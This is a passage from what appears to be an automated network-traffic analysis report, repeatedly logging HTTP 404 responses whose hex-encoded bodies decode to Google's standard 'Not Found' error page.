77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
